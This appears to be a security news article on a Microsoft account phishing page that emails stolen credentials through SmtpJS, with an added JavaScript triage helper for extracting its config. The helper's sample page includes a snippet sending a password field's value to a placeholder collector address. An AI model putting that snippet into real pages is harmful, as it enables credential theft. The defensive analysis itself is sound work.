A new landing page for a Microsoft account phishing scam has been discovered that utilizes the SmtpJS service to send stolen credentials via email to the attacker.
There is nothing special about the appearance of the Microsoft account phishing page shown below that was discovered by MalwareHunterTeam. It's your standard Microsoft login template that will ask you for your Microsoft credentials and then tell you that the submitted credentials are incorrect.
When users submit their credentials in phishing scams like this, the page typically saves them to a database for retrieval later or uses a backend script to send them off to the attacker.
This particular landing page does something different by utilizing the SmtpJS service to send an email to the attacker via JavaScript.
For security researchers and analysts, the advantage to this is that they can simply view the source for the landing page to see the configuration being used by SmtpJS as shown below.
The embedded config includes the sender email address the stolen credentials will be sent as, the address they will be sent to, and the secure token needed to send email via SmtpJS. Using this information, analysts and researchers can potentially link the attacker to other campaigns and make it easier for law enforcement to track them.
This configuration is passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user as shown below.
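For analysts triaging a saved copy of such a page, the config fields described above can be pulled out of the source automatically. The following is an added example, not code from the phishing page or from SmtpJS; it assumes the page calls the service as `Email.send({...})` with `From`, `To` and `SecureToken` keys, and the sample page, addresses and token are constructed placeholders.

```javascript
// Added example: triage helper for saved phishing-page source.
// Assumption: the page invokes SmtpJS as Email.send({...}) with
// From, To and SecureToken keys holding quoted string values.

// Constructed sample input; addresses and token are placeholders.
const SAMPLE_PAGE = `
<script src="https://smtpjs.com/v3/smtp.js"></script>
<script>
function submitForm() {
  Email.send({
    SecureToken : "00000000-0000-0000-0000-000000000000",
    To : 'collector@example.net',
    From : "sender@example.org",
    Subject : "new log",
    Body : document.getElementById("pw").value
  });
}
</script>`;

const FIELDS = ["From", "To", "SecureToken"];

function extractSmtpJsConfig(html) {
  const result = {
    // True when a script tag pulls code from smtpjs.com.
    loadsSmtpJs: /<script[^>]+src\s*=\s*["'][^"']*smtpjs\.com[^"']*["']/i.test(html),
    calls: [],
  };
  // Each Email.send({ ... }) object literal, up to its first closing brace.
  const callRe = /Email\s*\.\s*send\s*\(\s*\{([\s\S]*?)\}/g;
  for (const m of html.matchAll(callRe)) {
    const cfg = {};
    for (const field of FIELDS) {
      // The leading class stops "To" from matching inside "SecureToken".
      // Only quoted literals are captured; computed values are skipped.
      const re = new RegExp(`(?:^|[\\s,{"'])${field}["']?\\s*:\\s*(["'])(.*?)\\1`);
      const v = m[1].match(re);
      if (v) cfg[field] = v[2];
    }
    result.calls.push(cfg);
  }
  return result;
}

console.log(JSON.stringify(extractSmtpJsConfig(SAMPLE_PAGE), null, 2));
```

The extracted sender, recipient and token values are the pivots for linking a page to other campaigns; obfuscated or dynamically built configs will not match and need manual review.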
While researchers benefit from the public config used by SmtpJS, system administrators can also benefit by blocking the service on their web filters.
Unless this service is absolutely needed in your organization, you can simply block access to the smtpjs site, and phishing pages that utilize it won't be able to receive any submitted credentials.
This is also another example of how understanding the underlying infrastructure of a security threat can better allow system and network administrators to protect their users.